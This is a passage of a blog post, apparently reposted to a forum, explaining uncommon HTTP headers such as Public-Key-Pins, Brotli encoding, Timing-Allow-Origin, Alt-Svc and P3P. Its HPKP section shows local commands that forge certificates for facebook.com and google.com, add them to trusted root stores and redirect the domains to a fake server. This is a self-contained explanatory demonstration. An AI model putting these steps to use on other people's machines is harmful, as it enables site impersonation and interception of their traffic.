luck. This header is very strictly enforced. You'd need to ask all of your users to clear their browsing history and settings. Public-Key-Pins HTTP Public Key Pinning (HPKP) is a security mechanism which allows HTTPS websites to resist impersonation by attackers using mis-issued or otherwise fraudulent certificates. Values pin-sha256="<sha256>" The quoted string is the Base64 encoded Subject Public Key Information (SPKI) fingerprint. It is possible to specify multiple pins for different public keys. Some browsers might allow other hashing algorithms than SHA-256 in the future. max-age=<seconds> The time, in seconds, that the browser should remember that this site is only to be accessed using one of the pinned keys. includeSubDomains If this optional parameter is specified, this rule applies to all of the site's subdomains as well. report-uri="<URL>" If this optional parameter is specified, pin validation failures are reported to the given URL. Instead of using a Public-Key-Pins header you can also use a Public-Key-Pins-Report-Only header. This header only sends reports to the report-uri specified in the header and does still allow browsers to connect to the webserver even if the pinning is violated. That is what Facebook is doing: $ curl -I https://www.facebook.com/ HTTP/1.1 200 OK ... Public-Key-Pins-Report-Only: max-age=500; pin-sha256="WoiWRyIOVNa9ihaBciRSC7XHjliYS9VwUGOIud4PB18="; pin-sha256="r/mIkG3eEpVdm+u/ko/cwxzOMo1bk4TyHIlByibiA5E="; pin-sha256="q4PO2G2cbkZhZ82+JgmRUyGMoAeozA+BSXVXQWB8XWQ="; report-uri="http://reports.fb.com/hpkp/" Why do we need this? Isn't trusting Certificate Authorities enough? An attacker could create their own certificate for www.facebook.com and trick me into adding it to my trust root certificate store. Or it could be an administrator in your organization. Let's create a certificate for www.facebook.com. sudo mkdir /etc/certs echo -e 'US\nCA\nSF\nFB\nXX\nwww.facebook.com\nno@spam.org' | \ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ -keyout /etc/certs/facebook.key \ -out /etc/certs/facebook.crt And make it trusted on our computer. # curl sudo cp /etc/certs/*.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates # Google Chrome sudo apt install libnss3-tools -y certutil -A -t "C,," -n "FB" -d sql:$HOME/.pki/nssdb -i /etc/certs/facebook.crt # Mozilla Firefox #certutil -A -t "CP,," -n "FB" -d sql:`ls -1d $HOME/.mozilla/firefox/*.default | head -n 1` -i /etc/certs/facebook.crt Let's create our own web server that uses this certificate. var fs = require('fs') var https = require('https') var express = require('express') var options = { key: fs.readFileSync(`/etc/certs/${process.argv[2]}.key`), cert: fs.readFileSync(`/etc/certs/${process.argv[2]}.crt`) } var app = express() app.use((req, res) => res.send(`<h1>hacked</h1>`)) https.createServer(options, app).listen(443) Switch to our server. echo 127.0.0.1 www.facebook.com | sudo tee -a /etc/hosts sudo node server.js facebook Does it work? $ curl https://www.facebook.com <h1>hacked</h1> Good. curl validates certificates. Because I've visited Facebook before and Google Chrome has seen the header, it should report the attack but still allow it, right? Nope. Public-key pinning was bypassed by a local root certificate. Interesting. Alright, what about www.google.com? echo -e 'US\nCA\nSF\nGoogle\nXX\nwww.google.com\nno@spam.org' | \ sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \ -keyout /etc/certs/google.key \ -out /etc/certs/google.crt sudo cp /etc/certs/*.crt /usr/local/share/ca-certificates/ sudo update-ca-certificates certutil -A -t "C,," -n "Google" -d sql:$HOME/.pki/nssdb -i /etc/certs/google.crt echo 127.0.0.1 www.google.com | sudo tee -a /etc/hosts sudo node server.js google Same. I guess this is a feature. Anyway, if you don't add these certificates to your store, you won't be able to visit these sites because the option to add an exception in Firefox or Proceed unsafely in Chrome are not available. Content-Encoding: br The content is compressed with Brotli. It promises better compression density and comparable decompression speed to gzip. It is supported by Google Chrome. Naturally, there is a node.js module for it. var shrinkRay = require('shrink-ray') var request = require('request') var express = require('express') request('https://www.gutenberg.org/files/1342/1342-0.txt', (err, res, text) => { if (err) throw new Error(err) var app = express() app.use(shrinkRay()) app.use((req, res) => res.header('content-type', 'text/plain').send(text)) app.listen(1234) }) Uncompressed: 700 KB Brotli: 204 KB Gzip: 241 KB Timing-Allow-Origin The Resource Timing API allows you to measure how long it takes to fetch resources on your page. Because timing information can be used to determine whether or not a user has previously visited a URL (based on whether the content or DNS resolution are cached), the standard deemed it a privacy risk to expose timing information to arbitrary hosts. <script> setTimeout(function() { console.log(window.performance.getEntriesByType('resource')) }, 1000) </script> <img src="http://placehold.it/350x150"> <img src="/local.gif"> It looks like you can get detailed timing information (domain lookup time, for example) only for resources that are on your origin unless the Timing-Allow-Origin is set. Here's how you can use it. Timing-Allow-Origin: * Timing-Allow-Origin: http://foo.com http://bar.com Alt-Svc Alternative Services allow an origin's resources to be authoritatively available at a separate network location, possibly accessed with a different protocol configuration. This one is used by Google: alt-svc: quic=":443"; ma=2592000; v="36,35,34" It means that the browser can use, if it wants to, the QUIC (Quick UDP Internet Connections) or HTTP over UDP protocol on port 443 for the next 30 days (max age is 2592000 seconds or 720 hours or 30 days). No idea what v stands for. Version? https://www.mnot.net/blog/2016/03/09/alt-svc https://ma.ttias.be/googles-quic-protocol-moving-web-tcp-udp/ P3P Here's a couple of P3P headers I've seen: P3P: CP="This is not a P3P policy! See https://support.google.com/accounts/answer/151657?hl=en for more info." P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Some browsers require third party cookies to use the P3P protocol to state their privacy practices. The organization that established P3P, the World Wide Web Consortium, suspended its work on this standard several years ago because most modern web browsers don't fully support P3P. As a result, the P3P standard is now out of date and doesn't reflect technologies that are currently in use on the web, so most websites currently don't have P3P policies. I did not do much research on this but it looks like this is needed for IE8 to accept 3rd party cookies. This is accepted by Internet Explorer. For example, IE's "high" privacy setting blocks all cookies from websites that do not have a compact privacy policy, but cookies accompanied by P3P non-policies like those above are not blocked. Sursa: https://peteris.rocks/blog/exotic-http-headers/
×
×
  • Create New...